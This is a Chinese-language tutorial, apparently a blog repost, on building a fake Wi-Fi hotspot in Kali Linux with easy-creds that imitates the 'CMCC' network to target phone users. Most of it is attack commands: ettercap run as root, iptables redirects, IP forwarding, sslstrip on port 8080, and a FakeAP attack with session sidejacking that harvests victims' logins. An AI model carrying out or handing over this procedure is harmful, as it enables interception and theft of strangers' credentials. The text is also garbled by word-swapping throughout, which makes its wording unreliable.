揭秘:打击者如安在Kali Linux中搭建垂钓热点 8090安适门户
文中提及的部分技术可能带有必然打击性,仅供安适学习和教学用途,禁止犯警使用!
0×00 尝试环境操纵系统:Kali 1.0 (VM)
FackAP: easy-creds
硬件:NETGEAR wg111 v3 RTL8187B 网卡(kali下免驱)
靶机:安卓、iPhone设备
0×01 环境搭建git clone https://github.com/brav0hax/easy-creds cd easy-creds
bash install.sh
选择第一项:1. Debian/Ubuntu and derivatives
这一步设定easy-creds的安置目录:/opt ,安置过程中会从国外网站下载一些依赖包以及第三方软件,这一过程中建议通过翻墙来节省时间。
当看到提示happy hunting的时候便意味着安置完成了:
0×02
按照上述法式已将easy-creds安置到Kali中,我们可以在终端执行easy-creds运行,接下来我们需要对软件、系统参数进行一些改削:
2.1 改削etter uid、gid值 &开启iptables端口转发kali中自带了中间人打击的一些工具,如:ettercap,在第一次使用ettercap时,我们需要改削其默认配置文件/etc/ettercap/etter.conf: (有的系统中,ettercap的配置文件路径为:/etc/etter.conf)
需要我们把ettercap的ec_uid、ec_gid的值改削为0:以系统最高权限运行。
此外,如果系统使用了iptables防火墙,还需打消#后的注释使iptables配置生效,将:
# if you use iptables: #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"改削为:
# if you use iptables: redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" 2.2 开启ipv4数据包转发:echo 1 >> /proc/sys/net/ipv4/ip_forward 2.3 配置iptables法则:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 2.4 运行sslstrip
sslstrip -l 8080 2.5 开启网络打点 &重启网络打点处事
vim /etc/NetworkManager/NetworkManager.conf
将managed=false改削为managed=true:
重启网络打点处事:
service network-manager restart 0×03 运行easy-creds终端执行:easy-creds
选择第三项:FakeAP Attacks
选择第一项:FakeAP Attack Static
y确定包罗sidejacking劫持打击:
下一步选择WIFI网络的流量入口:eth0
选择无线网络接口&设备:wlan0
设定WIFI-SSID:CMCC
WIFI网络信道:5
mon0
n
at0
n
为无线网络设置网段:192.168.88.0/24
设定DNS处事器:8.8.8.8
完成之后,easy-creds启动了Airbase-NG、DMESG、SSLStrip、Ettercap tunnel、URL snarf、Dsniff等工具:
温馨提示: 本文由杰米博客推荐,转载请保留链接: https://www.jmwww.net/file/pc/12589.html